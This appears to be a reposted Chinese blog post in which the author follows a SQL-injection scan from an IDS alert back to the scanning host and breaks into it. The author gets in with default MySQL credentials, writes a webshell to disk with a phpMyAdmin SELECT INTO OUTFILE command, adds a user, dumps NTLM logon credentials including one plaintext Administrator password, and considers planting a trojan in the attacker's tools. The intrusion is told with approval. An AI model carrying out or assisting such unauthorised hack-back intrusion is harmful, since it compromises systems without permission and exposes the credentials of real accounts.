清晨起来打开窗,心情美美哒~~
然后就看见IDS报警了。。。报文如下:
![记一次通过IDS告警日志反怼扫描小黑](http://p2.ttnews.xyz/loading.gif)
标准的DEDECMS SQL注入EXP。以前对这种扫描都是忽略不见(公司网站JAVA系列),今天心血来潮,反日一下,看看是谁在作妖。
![记一次通过IDS告警日志反怼扫描小黑](http://p2.ttnews.xyz/loading.gif)
一、nmap扫描IP,开了80,访问一下得到UPUPW的站点。
得到网站根目录:C:/Users/Administrator/Downloads/UPUPW_AP5.6-1510/UPUPW_AP5.6/htdocs。 顺手mysql密码试一下~ root root ~
二、UPUPW默认的phpmyadmin路径为pmd。root权限进入后,直接写入webshell。
select "" into outfile "C:/Users/Administrator/Downloads/UPUPW_AP5.6-1510/UPUPW_AP5.6/htdocs/main.php";
还好顺利执行,并没有逼得我用UDF 或者log文件来写出shell~
三、连上shell,执行添加用户命令。
小黑看来比较疏忽安全,一点点防备都没有~~~
四、3389登录进入,dump下密码扩大化点战果。
Authentication Id:0;823353088
Authentication Package:NTLM
Primary User:admin
Authentication Domain:SEO-DICK-1
* User: admin
* Domain: SEO-DICK-1
* Password: 强势打码
Authentication Id:0;405599992
Authentication Package:NTLM
Primary User:angge$
Authentication Domain:SEO-DICK-1
* User: angge$
* Domain: SEO-DICK-1
* Password: 强势打码
Authentication Id:0;714996
Authentication Package:NTLM
Primary User:Administrator
Authentication Domain:SEO-DICK-1
* User: Administrator
* Domain: SEO-DICK-1
* Password: SEOdick007!@#123
这里发现一个隐藏用户angge,貌似是前人已经日过~从Administrator密码来看,大黑阔应该是做黑帽SEO的。
五、看看黑阔在干嘛。
批量扫描脚本-.- 比较简陋。
顺手收割小黑的果实。
六、T掉Administrator用户,开启WIN安全登录事件,抓下黑阔登录IP。
180.232.122.202 菲律宾普通宽带用户,马尼拉 马卡蒂。看来大黑阔可能肉身已经翻墙了。
七、更多攻击畅想
替换Administrator用户扫描的程序,套个木马进去,等待大黑阔本地执行。大黑阔也可能带着本地磁盘连接主机,这时候也可以访问他本地磁盘替换木马程序。
没再做更多测试,打完收工了。本人比较厌恶这些瞎JB一直扫的批量工具,搞的我IDS天天报警不断,主机上的工具就不发了。
閱讀更多 信息安全搬運工 的文章
關鍵字: 根目录 phpMyAdmin 编程语言